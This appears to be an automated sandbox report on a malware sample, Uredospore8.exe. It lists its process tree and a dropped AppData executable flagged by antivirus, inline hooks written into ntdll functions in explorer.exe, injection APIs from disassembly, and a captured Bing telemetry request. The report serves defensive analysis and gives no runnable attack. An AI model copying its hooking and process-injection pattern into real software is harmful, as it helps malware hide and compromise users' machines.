Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	173.222.162.64	443	4964	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 18:36:14 UTC	2256	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900C4F3 X-BM-CBT: 1696488253 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581D X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900C4F3 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 516 Connection: Keep-Alive Cache-Control: no-cache Cookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
2024-08-29 18:36:14 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-08-29 18:36:14 UTC	515	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 38 31 43 36 31 45 30 39 34 39 38 44 34 31 43 43 39 37 43 44 42 42 41 33 35 34 38 32 34 45 44 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 33 35 31 41 41 38 32 41 45 39 30 43 34 36 36 39 39 46 35 42 31 46 45 33 34 32 42 45 37 45 31 30 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>81C61E09498D41CC97CDBBA354824ED1</CID><Events><E><T>Event.ClientInst</T><IG>351AA82AE90C46699F5B1FE342BE7E10</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-08-29 18:36:14 UTC	480	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 369206E49A994EACA6AC83DE516496E7 Ref B: LAX311000108047 Ref C: 2024-08-29T18:36:14Z Date: Thu, 29 Aug 2024 18:36:14 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.24a6dc17.1724956574.147475df

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwResumeThread	INLINE	explorer.exe
NtQueryDirectoryFile	INLINE	explorer.exe
ZwEnumerateValueKey	INLINE	explorer.exe
NtResumeThread	INLINE	explorer.exe
ZwCreateUserProcess	INLINE	explorer.exe
NtEnumerateValueKey	INLINE	explorer.exe
NtCreateUserProcess	INLINE	explorer.exe
ZwQueryDirectoryFile	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwResumeThread	INLINE	0xE9 0x9E 0xE1 0x12 0x25 0x51
NtQueryDirectoryFile	INLINE	0xE9 0x98 0x81 0x12 0x29 0x91
ZwEnumerateValueKey	INLINE	0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtResumeThread	INLINE	0xE9 0x9E 0xE1 0x12 0x25 0x51
ZwCreateUserProcess	INLINE	0xE9 0x93 0x31 0x11 0x17 0x71
NtEnumerateValueKey	INLINE	0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtCreateUserProcess	INLINE	0xE9 0x93 0x31 0x11 0x17 0x71
ZwQueryDirectoryFile	INLINE	0xE9 0x98 0x81 0x12 0x29 0x91

Target ID:	0
Start time:	14:35:53
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\Uredospore8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Uredospore8.exe"
Imagebase:	0x400000
File size:	69'632 bytes
MD5 hash:	50C7CE412D99EB4769411D6B60A34AC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:36:03
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\Uredospore8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Uredospore8.exe"
Imagebase:	0x400000
File size:	69'632 bytes
MD5 hash:	50C7CE412D99EB4769411D6B60A34AC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:36:03
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\winver.exe
Wow64 process (32bit):	true
Commandline:	winver
Imagebase:	0xff0000
File size:	57'344 bytes
MD5 hash:	B5471B0FB5402FC318C82C994C6BF84D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:36:03
Start date:	29/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:36:05
Start date:	29/08/2024
Path:	C:\Windows\System32\sihost.exe
Wow64 process (32bit):	false
Commandline:	sihost.exe
Imagebase:	0x7ff6440e0000
File size:	111'616 bytes
MD5 hash:	A21E7719D73D0322E2E7D61802CB8F80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	14:36:06
Start date:	29/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	14:36:06
Start date:	29/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:36:06
Start date:	29/08/2024
Path:	C:\Windows\System32\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"ctfmon.exe"
Imagebase:	0x7ff796d20000
File size:	11'264 bytes
MD5 hash:	B625C18E177D5BEB5A6F6432CCF46FB3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:36:07
Start date:	29/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:36:07
Start date:	29/08/2024
Path:	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Imagebase:	0x7ff733150000
File size:	793'416 bytes
MD5 hash:	5CDDF06A40E89358807A2B9506F064D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	14:36:09
Start date:	29/08/2024
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6ae840000
File size:	103'288 bytes
MD5 hash:	BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:36:10
Start date:	29/08/2024
Path:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Imagebase:	0x7ff7bfd80000
File size:	3'671'400 bytes
MD5 hash:	5E1C9231F1F1DCBA168CA9F3227D9168
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	14:36:11
Start date:	29/08/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Imagebase:	0x7ff642ec0000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	14:36:20
Start date:	29/08/2024
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6ae840000
File size:	103'288 bytes
MD5 hash:	BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	14:36:20
Start date:	29/08/2024
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6ae840000
File size:	103'288 bytes
MD5 hash:	BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	14:36:21
Start date:	29/08/2024
Path:	C:\Windows\System32\smartscreen.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\smartscreen.exe -Embedding
Imagebase:	0x7ff77db50000
File size:	2'378'752 bytes
MD5 hash:	02FB7069B8D8426DC72C9D8A495AF55A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:36:22
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
Imagebase:	0x400000
File size:	69'632 bytes
MD5 hash:	73120A9C2658CFAB57CF191468A630A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:36:22
Start date:	29/08/2024
Path:	C:\Windows\System32\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\ApplicationFrameHost.exe -Embedding
Imagebase:	0x7ff65c4c0000
File size:	78'456 bytes
MD5 hash:	D58A8A987A8DAFAD9DC32A548CC061E7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	14:36:24
Start date:	29/08/2024
Path:	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
Imagebase:	0x7ff7f0f30000
File size:	19'456 bytes
MD5 hash:	6C44453CD661FC2DB18E4C09C4940399
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	14:36:25
Start date:	29/08/2024
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6ae840000
File size:	103'288 bytes
MD5 hash:	BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	14:36:25
Start date:	29/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	14:36:26
Start date:	29/08/2024
Path:	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
Imagebase:	0x7ff65b490000
File size:	19'232 bytes
MD5 hash:	F050189D49E17D0D340DE52E9E5B711F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	14:36:28
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0x4
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	14:36:28
Start date:	29/08/2024
Path:	C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
Imagebase:	0x7ff76ba30000
File size:	19'776 bytes
MD5 hash:	DA7063B17DBB8BBB3015351016868006
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:36:29
Start date:	29/08/2024
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6ae840000
File size:	103'288 bytes
MD5 hash:	BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:36:30
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	14:36:30
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
Imagebase:	0x400000
File size:	69'632 bytes
MD5 hash:	73120A9C2658CFAB57CF191468A630A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:36:30
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	14:36:30
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	14:36:31
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	14:36:33
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
Imagebase:	0x400000
File size:	69'632 bytes
MD5 hash:	73120A9C2658CFAB57CF191468A630A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:36:33
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	14:36:33
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	14:36:34
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	14:36:34
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	14:36:35
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	14:36:35
Start date:	29/08/2024
Path:	C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
Imagebase:	0x180000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	91.1%
Signature Coverage:	60%
Total number of Nodes:	45
Total number of Limit Nodes:	3

Executed Functions

Function 007005BC Relevance: 6.1, APIs: 4, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,00000008,00000000), ref: 007005DA
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000008,00000000), ref: 007005FB
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0070062B
NtWriteVirtualMemory.NTDLL(?,?,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0070064D

Part of subcall function 00700655: NtWriteVirtualMemory.NTDLL(?,?,00700F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0070066F

Memory Dump Source

Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd

Similarity

API ID: Memory$VirtualWrite$ProcessRead
String ID:
API String ID: 2369493071-0
Opcode ID: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
Instruction ID: 0c97f880734d4ab1c25f3b1b2600d48d0f88ddb6c8c73f2c79bac5f9af469923
Opcode Fuzzy Hash: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
Instruction Fuzzy Hash: 3C111EB0380745FBE7209F45CCC5F96B765FF08300F544224BB085A292CB757964DB95

Function 00401200 Relevance: 4.8, APIs: 1, Strings: 1, Instructions: 1258COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401205

Strings

VB5!6&*, xrefs: 00401200

Memory Dump Source

Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 5bfbbd12606dd50e58570d659215e4fe04599de5ad0ca88f87aebfa80355d611
Instruction ID: 370cdd00e1117dfb613e7187a89d158553f8b934a7d660418ea53e2684d9436a
Opcode Fuzzy Hash: 5bfbbd12606dd50e58570d659215e4fe04599de5ad0ca88f87aebfa80355d611
Instruction Fuzzy Hash: D5A2153591B731DFC2D3DB34804296EFB15EE37B02748439BE402B5AB9C33A94269796

Function 00700655 Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,00700F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0070066F

Memory Dump Source

Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

